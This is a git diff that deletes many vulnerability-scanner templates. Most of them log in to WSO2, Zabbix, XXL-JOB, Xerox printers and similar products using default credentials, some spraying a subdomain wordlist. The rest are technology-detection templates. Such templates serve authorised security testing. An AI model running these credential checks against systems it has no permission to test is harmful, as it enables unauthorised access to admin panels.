-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /login.php?action=login&type=admin HTTP/1.1
- Host: {{Subdomains}}
- Accept: */*
- X-Requested-With: XMLHttpRequest
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Connection: close
-
- username=admin&password=admin
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - "text/html"
- part: header
-
- - type: word
- words:
- - '"success":"true"'
- - '"data":'
- part: body
- condition: and
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/wifisky-default-password-11206.yaml b/tmp/default/wifisky-default-password-11206.yaml
deleted file mode 100644
index ca6bb5a175..0000000000
--- a/tmp/default/wifisky-default-password-11206.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: wifisky-default-password
-info:
- name: Wifisky Default Password
- author: pikpikcu
- severity: high
- tags: default-login,wifisky
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /login.php?action=login&type=admin HTTP/1.1
- Host: {{Subdomains}}
- Accept: */*
- X-Requested-With: XMLHttpRequest
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Connection: close
-
- username=admin&password=admin
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "text/html"
- part: header
- - type: word
- words:
- - '"success":"true"'
- - '"data":'
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/wifisky-default-password-cnvd-2021-39012.yaml b/tmp/default/wifisky-default-password-cnvd-2021-39012.yaml
deleted file mode 100644
index 36e171ce3d..0000000000
--- a/tmp/default/wifisky-default-password-cnvd-2021-39012.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-wifisky-default-password-cnvd-2021-39012
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /login.php?action=login&type=admin
- body: username=admin&password=admin
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录,为保证设备安全,请立即修改密码\"}")
-expression: r0()
-detail:
- author: Print1n(http://print1n.top)
- links:
- - https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012
diff --git a/tmp/default/wildfly-default-login_1_1.yaml b/tmp/default/wildfly-default-login_1_1.yaml
deleted file mode 100644
index c72244892c..0000000000
--- a/tmp/default/wildfly-default-login_1_1.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: wildfly-default-login
-
-info:
- name: Wildfly - Default Admin Login
- author: s0obi
- severity: high
- description: |
- Wildfly default admin login credentials were successful.
- reference:
- - https://docs.wildfly.org/26.1/#administrator-guides
- tags: wildfly,default-login
-
-http:
- - raw:
- - |
- GET /management HTTP/1.1
- Host: {{Hostname}}
-
- digest-username: admin
- digest-password: admin
- matchers-condition: and
- matchers:
-
- - type: word
- part: body
- words:
- - "management-major-version"
- - "product-version"
- condition: and
-
- - type: word
- part: header
- words:
- - "application/json"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/07/04
diff --git a/tmp/default/wso2-default-login-11642.yaml b/tmp/default/wso2-default-login-11642.yaml
deleted file mode 100644
index c05a3bd88d..0000000000
--- a/tmp/default/wso2-default-login-11642.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: wso2-default-login
-info:
- name: WSO2 Management Console Default Login
- author: cocxanh
- severity: high
- reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
- tags: default-login,wso2
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /carbon/admin/login_action.jsp HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- username=admin&password=admin
- matchers:
- - type: word
- words:
- - "/carbon/admin/index.jsp?loginStatus=true"
- - "JSESSIONID"
- part: header
- condition: and
diff --git a/tmp/default/wso2-default-login.yaml b/tmp/default/wso2-default-login.yaml
deleted file mode 100644
index ce4e806121..0000000000
--- a/tmp/default/wso2-default-login.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: wso2-default-login
-
-info:
- name: WSO2 Management Console Default Login
- author: cocxanh
- severity: high
- reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
- tags: default-login,wso2
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /carbon/admin/login_action.jsp HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- username=admin&password=admin
- matchers:
- - type: word
- words:
- - "/carbon/admin/index.jsp?loginStatus=true"
- - "JSESSIONID"
- part: header
- condition: and
diff --git a/tmp/default/xampp-default-page-11660.yaml b/tmp/default/xampp-default-page-11660.yaml
deleted file mode 100644
index aa834b5347..0000000000
--- a/tmp/default/xampp-default-page-11660.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: xampp-default-page
-info:
- name: XAMPP Default Page
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22XAMPP%22&page=1
- tags: tech,php,xampp,apache
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /dashboard/ HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Welcome to XAMPP'
- - type: status
- status:
- - 200
diff --git a/tmp/default/xampp-default-page.yaml b/tmp/default/xampp-default-page.yaml
deleted file mode 100644
index a9481de823..0000000000
--- a/tmp/default/xampp-default-page.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: xampp-default-page
-
-info:
- name: XAMPP Default Page
- author: dhiyaneshDK
- severity: info
- metadata:
- shodan-query: http.title:"XAMPP"
- tags: tech,php,xampp,apache
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/dashboard/'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Welcome to XAMPP'
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/xerox-workcentre7-default-password.yaml b/tmp/default/xerox-workcentre7-default-password.yaml
deleted file mode 100644
index 220e5f9c93..0000000000
--- a/tmp/default/xerox-workcentre7-default-password.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: xerox-workcentre7-default-password
-
-info:
- name: Xerox WorkCentre 7xxx - Default Login
- author: MiroslavSotak
- severity: high
- verified: false
- description: Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer.
-
-rules:
- r0:
- request:
- method: POST
- path: /userpost/xerox.set
- body: _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default
- expression: response.status == 200 && response.body.bcontains(b'window.opener.top.location.pathname') && response.body.bcontains(b'Xerox Corporation') && (response.body.bcontains(b'invalid') || response.body.bcontains(b'errmsg'))
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/xerox7-default-login.yaml b/tmp/default/xerox7-default-login.yaml
deleted file mode 100644
index 0013809647..0000000000
--- a/tmp/default/xerox7-default-login.yaml
+++ /dev/null
@@ -1,55 +0,0 @@
-id: xerox7-default-login
-
-info:
- name: Xerox WorkCentre 7xxx Printer Default Login
- author: MiroslavSotak
- severity: high
- description: Xerox WorkCentre 7xxx printer. default admin credentials admin:1111 were discovered.
- reference:
- - https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 1
- tags: xerox,default-login
-
-http:
- - raw:
- - |
- POST /userpost/xerox.set HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername={{username}}&webPassword={{password}}&frmaltDomain=default
-
- attack: pitchfork
- payloads:
- username:
- - admin
- password:
- - 1111
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: body
- words:
- - "window.opener.top.location.pathname"
- - "Xerox Corporation"
- condition: and
-
- - type: word
- part: body
- words:
- - "invalid"
- - "errmsg"
- condition: or
- negative: true
-
-# digest: 4a0a00473045022100cc0e4b09bb25275c9c0a276e3f11b40de21ab51f3e27c6b5d10888dc68fd059c0220289c6276d2368a7f4c67a65fc315d062153dd58afdd8ddc4dae3b4bfd8ecc730:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/xxljob-default-login-11710.yaml b/tmp/default/xxljob-default-login-11710.yaml
deleted file mode 100644
index ab7d9ce0ce..0000000000
--- a/tmp/default/xxljob-default-login-11710.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: xxljob-default-login
-info:
- name: XXL-JOB default login
- author: pdteam
- severity: high
- tags: default-login,xxljob
- reference: https://github.com/xuxueli/xxl-job
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /xxl-job-admin/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 30
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- userName=admin&password=123456
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"code":200'
- - '"msg"'
- - '"content"'
- condition: and
- - type: word
- words:
- - 'application/json'
- - 'XXL_JOB_LOGIN_IDENTITY'
- part: header
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/xxljob-default-login.yaml b/tmp/default/xxljob-default-login.yaml
deleted file mode 100644
index be8c1b1e58..0000000000
--- a/tmp/default/xxljob-default-login.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: xxljob-default-login
-
-info:
- name: XXL-JOB default login
- author: pdteam
- severity: high
- tags: default-login,xxljob
- reference: https://github.com/xuxueli/xxl-job
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /xxl-job-admin/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 30
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- userName=admin&password=123456
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"code":200'
- - '"msg"'
- - '"content"'
- condition: and
-
- - type: word
- words:
- - 'application/json'
- - 'XXL_JOB_LOGIN_IDENTITY'
- part: header
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/zabbix-default-credentials-11759.yaml b/tmp/default/zabbix-default-credentials-11759.yaml
deleted file mode 100644
index 424ddb4f0f..0000000000
--- a/tmp/default/zabbix-default-credentials-11759.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: zabbix-default-credentials
-info:
- name: Zabbix Default Credentials
- author: pdteam
- severity: critical
- tags: zabbix,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /index.php HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- name=Admin&password=zabbix&autologin=1&enter=Sign+in
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "zabbix.php?action=dashboard.view"
- - type: status
- status:
- - 302
diff --git a/tmp/default/zabbix-default-credentials.yaml b/tmp/default/zabbix-default-credentials.yaml
deleted file mode 100644
index d44c2c44ae..0000000000
--- a/tmp/default/zabbix-default-credentials.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: zabbix-default-credentials
-
-info:
- name: Zabbix Default Credentials
- author: pdteam
- severity: critical
- tags: zabbix,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /index.php HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- name=Admin&password=zabbix&autologin=1&enter=Sign+in
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "zabbix.php?action=dashboard.view"
-
- - type: status
- status:
- - 302
\ No newline at end of file
diff --git a/tmp/default/zabbix-default-login-11761.yaml b/tmp/default/zabbix-default-login-11761.yaml
deleted file mode 100644
index 3ac1c1a3ab..0000000000
--- a/tmp/default/zabbix-default-login-11761.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: zabbix-default-login
-info:
- name: Zabbix Default Login
- author: pdteam
- severity: critical
- tags: zabbix,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /index.php HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
-
- name=Admin&password=zabbix&autologin=1&enter=Sign+in
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "zabbix.php?action=dashboard.view"
- - type: status
- status:
- - 302
diff --git a/tmp/default/zabbix-default-login.yaml b/tmp/default/zabbix-default-login.yaml
deleted file mode 100644
index e69bd61e67..0000000000
--- a/tmp/default/zabbix-default-login.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: zabbix-default-login
-
-info:
- name: Zabbix Default Login
- author: pdteam
- severity: critical
- tags: zabbix,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /index.php HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
-
- name=Admin&password=zabbix&autologin=1&enter=Sign+in
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "zabbix.php?action=dashboard.view"
-
- - type: status
- status:
- - 302
\ No newline at end of file
diff --git a/tmp/default/zabbix-default-password.yml b/tmp/default/zabbix-default-password.yml
deleted file mode 100644
index 3786940417..0000000000
--- a/tmp/default/zabbix-default-password.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-zabbix-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /index.php
- body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
- expression: response.status == 302 && response.headers["location"] == "zabbix.php?action=dashboard.view" && response.headers["set-cookie"].contains("zbx_session")
-expression: r0()
-detail:
- author: fuzz7j(https://github.com/fuzz7j)
- links:
- - https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/login
diff --git a/tmp/default/zmanda-default-login-11827.yaml b/tmp/default/zmanda-default-login-11827.yaml
deleted file mode 100644
index 900fd6c5e2..0000000000
--- a/tmp/default/zmanda-default-login-11827.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: zmanda-default-login
-info:
- name: Zmanda Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:admin on Zmanda application.
- reference: https://www.zmanda.com
- tags: zmanda,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /ZMC_Admin_Login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: zmc_cookies_enabled=true
-
- login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "ZMC - Backup Set Management"
- - type: status
- status:
- - 200
diff --git a/tmp/default/zmanda-default-login.yaml b/tmp/default/zmanda-default-login.yaml
deleted file mode 100644
index c17e94ed6f..0000000000
--- a/tmp/default/zmanda-default-login.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: zmanda-default-login
-
-info:
- name: Zmanda Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:admin on Zmanda application.
- reference: https://www.zmanda.com
- tags: zmanda,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /ZMC_Admin_Login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: zmc_cookies_enabled=true
-
- login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "ZMC - Backup Set Management"
-
- - type: status
- status:
- - 200
diff --git a/tmp/detect/Biometric-detect.yaml b/tmp/detect/Biometric-detect.yaml
deleted file mode 100644
index 7db4c1a484..0000000000
--- a/tmp/detect/Biometric-detect.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: biometric-detect
-
-info:
- name: Biometric or Fingerprint detect
- author: gaurang
- severity: info
-
-file:
- - extensions:
- - all
-
- matchers:
- - type: word
- words:
- - "android.permission.USE_FINGERPRINT"
- - "android.permission.USE_BIOMETRIC"
\ No newline at end of file
diff --git a/tmp/detect/CORS-initial-detect.yaml b/tmp/detect/CORS-initial-detect.yaml
deleted file mode 100644
index 1095102e70..0000000000
--- a/tmp/detect/CORS-initial-detect.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: CORS-initial-detect
-
-info:
- name: Detect CORS
- author: jtcsec
- severity: info
- tag: cors
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- headers:
- Origin: "{{BaseURL}}"
- matchers:
- - type: word
- words:
- - "Access-Control-Allow"
- part: header
diff --git a/tmp/detect/achecker-detect.yaml b/tmp/detect/achecker-detect.yaml
deleted file mode 100644
index 8e81f85bfa..0000000000
--- a/tmp/detect/achecker-detect.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: achecker-detect
-info:
- name: AChecker Detect
- author: princechaddha
- severity: info
- tags: tech,achecker
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /checker/login.php HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - ": Web Accessibility Checker"
- - "AChecker - Copyright"
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/detect/adminer-panel-detect.yaml b/tmp/detect/adminer-panel-detect.yaml
deleted file mode 100644
index bbe88039ae..0000000000
--- a/tmp/detect/adminer-panel-detect.yaml
+++ /dev/null
@@ -1,57 +0,0 @@
-id: adminer-panel-detect
-
-info:
- name: Adminer Login Panel - Detect
- author: random_robbie,meme-lord
- severity: info
- description: Adminer login panel was detected.
- reference:
- - https://blog.sorcery.ie/posts/adminer/
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
- cwe-id: CWE-200
- tags: fuzz,adminer,login,panel
-
- # <= 4.2.4 can have unauthenticated RCE via SQLite driver
- # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL
- # Most versions have some kind of SSRF usability
- # Is generally handy if you find SQL creds
- metadata:
- max-request: 741
-
-http:
-
- - raw:
- - |
- GET {{path}} HTTP/1.1
- Host: {{Hostname}}
- Accept: application/json, text/plain, */*
- Referer: {{BaseURL}}
-
- payloads:
- path: helpers/wordlists/adminer-paths.txt
-
- threads: 50
- stop-at-first-match: true
- matchers-condition: and
- matchers:
-
- - type: word
- condition: and
- words:
- - "- Adminer"
- - "partial(verifyVersion"
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - '([0-9.]+)'
-
-# Enhanced by md on 2023/03/08
diff --git a/tmp/detect/adobe-coldfusion-detector-error.yaml b/tmp/detect/adobe-coldfusion-detector-error.yaml
deleted file mode 100644
index 1303eaf013..0000000000
--- a/tmp/detect/adobe-coldfusion-detector-error.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: adobe-coldfusion-detector-error
-info:
- name: Adobe ColdFusion Detector
- author: philippedelteil
- severity: info
- description: With this template we can detect a running ColdFusion instance due to an error page.
- reference: https://twitter.com/PhilippeDelteil/status/1418622775829348358
- tags: adobe,coldfusion
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /_something_.cfm HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'ColdFusion documentation'
- - type: status
- status:
- - 404
diff --git a/tmp/detect/aem-detection.yaml b/tmp/detect/aem-detection.yaml
deleted file mode 100644
index 8f8f7a24ff..0000000000
--- a/tmp/detect/aem-detection.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: aem-detection
-
-info:
- name: Favicon based AEM Detection
- severity: info
- author: shifacyclewala,hackergautam
- tags: aem,favicon,tech
- reference: |
- - https://twitter.com/brsn76945860/status/1171233054951501824
- - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
- - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- - https://github.com/devanshbatham/FavFreak
- - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /libs/granite/core/content/login/favicon.ico HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
diff --git a/tmp/detect/airflow-detect.yaml b/tmp/detect/airflow-detect.yaml
deleted file mode 100644
index e2c0706c46..0000000000
--- a/tmp/detect/airflow-detect.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: airflow-detect
-
-info:
- name: Apache Airflow
- author: pdteam
- severity: info
- metadata:
- verified: true
- shodan-query: http.html:"Apache Airflow"
- tags: tech,apache,airflow
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/{{randstr}}"
-
- matchers-condition: and
- matchers:
-
- - type: word
- part: body
- words:
- - "Airflow 404 = lots of circles"
-
- - type: status
- status:
- - 404
diff --git a/tmp/detect/amazon-mws-auth-token-detect.yaml b/tmp/detect/amazon-mws-auth-token-detect.yaml
deleted file mode 100644
index 18471162e6..0000000000
--- a/tmp/detect/amazon-mws-auth-token-detect.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-info:
- id: amazon-mws-auth-token-detect
- name: Amazon MWS Auth Token - Detect
- author: OpenAI
- description: Template to detect Amazon MWS (Marketplace Web Service) Auth Tokens
- severity: Info
- classification:
- country: any
- tags:
- - amazon
- - mws
- - marketplace web service
- - auth token
-
- matcher-condition: and
-
- requests:
- method: GET
- path:
- - "/"
- description: Attempt to access the Amazon MWS Auth Token
-
- matchers:
- - pattern: "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
- type: body
- description: Amazon MWS Auth Token detected in the response body
-
- response:
- - status:
- - 200
- description: Successful response status
diff --git a/tmp/detect/amazon-sns-topic-disclosure-detect.yaml b/tmp/detect/amazon-sns-topic-disclosure-detect.yaml
deleted file mode 100644
index 66334781b6..0000000000
--- a/tmp/detect/amazon-sns-topic-disclosure-detect.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-info:
- id: amazon-sns-topic-disclosure-detect
- name: Amazon SNS Topic Disclosure - Detect
- author: OpenAI
- description: Template to detect Amazon SNS (Simple Notification Service) topic disclosure
- severity: Info
- classification:
- country: any
- tags:
- - amazon
- - sns
- - simple notification service
- - topic disclosure
-
- matcher-condition: and
-
- requests:
- method: GET
- path:
- - "/"
- description: Attempt to retrieve Amazon SNS topics
-
- matchers:
- - pattern: 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
- type: body
- description: Amazon SNS topic ARN found in response body
-
- response:
- - status:
- - 200
- description: Successful response status
diff --git a/tmp/detect/apache-axis-detect.yaml b/tmp/detect/apache-axis-detect.yaml
deleted file mode 100644
index 7b6c4ff9ce..0000000000
--- a/tmp/detect/apache-axis-detect.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: apache-axis-detect
-
-info:
- name: apache-axis-detect
- author: dogasantos
- severity: info
- description: Axis and Axis2 detection
- metadata:
- verified: true
- shodan-query: http.html:"Apache Axis"
- tags: tech,axis2,middleware,apache
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- - "{{BaseURL}}/axis2/"
- - "{{BaseURL}}/axis/"
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Validate"
- - "Welcome"
- - "Axis"
- - "deployed"
- - "installation"
- - "Admin"
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/detect/apache-detect-349.yaml b/tmp/detect/apache-detect-349.yaml
deleted file mode 100644
index 174b2256a3..0000000000
--- a/tmp/detect/apache-detect-349.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: apache-version-detect
-info:
- name: Apache Version
- author: philippedelteil
- description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained
- severity: info
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: regex
- part: header
- regex:
- - "Apache+"
- - type: status
- status:
- - 200
- extractors:
- - type: kval
- part: header
- kval:
- - Server
diff --git a/tmp/detect/apache-detect.yaml b/tmp/detect/apache-detect.yaml
deleted file mode 100644
index 08cf79dc82..0000000000
--- a/tmp/detect/apache-detect.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: apache-detect
-
-info:
- name: Apache Detection
- author: philippedelteil
- severity: info
- description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained
- tags: tech,apache
- metadata:
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- part: header
- regex:
- - "Apache+"
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: kval
- part: header
- kval:
- - Server
diff --git a/tmp/detect/apache-dubbo-detect.yaml b/tmp/detect/apache-dubbo-detect.yaml
deleted file mode 100644
index db1d62196d..0000000000
--- a/tmp/detect/apache-dubbo-detect.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: apache-dubbo-detect
-
-info:
- name: Apache dubbo detect
- author: ffffffff0x
- severity: info
- metadata:
- fofa-query: app="APACHE-dubbo"
- tags: apache,dubbo,tech
- mongoid: 0000
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers:
- - type: word
- part: header
- words:
- - "Basic realm=\"dubbo\""
diff --git a/tmp/detect/autobahn-python-detect-592.yaml b/tmp/detect/autobahn-python-detect-592.yaml
deleted file mode 100644
index f1f4a312e4..0000000000
--- a/tmp/detect/autobahn-python-detect-592.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: autobahn-python-detect
-
-info:
- name: Autobahn-Python Webserver Detect
- author: pussycat0x
- severity: info
- reference: https://www.shodan.io/search?query=%22AutobahnPython%22
- tags: tech
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - 'AutobahnPython([ 0-9.]+)<\/h1>'
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- regex:
- - 'AutobahnPython([ 0-9.]+)'
diff --git a/tmp/detect/aws-elastic-beanstalk-detect-642.yaml b/tmp/detect/aws-elastic-beanstalk-detect-642.yaml
deleted file mode 100644
index 546f96edd5..0000000000
--- a/tmp/detect/aws-elastic-beanstalk-detect-642.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: elastic-beanstalk-detect
-info:
- name: AWS Elastic Beanstalk Detect
- author: pussycat0x
- severity: info
- tags: aws,tech,beanstalk
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
-
- matchers-condition: and
- matchers:
- - type: word
- words:
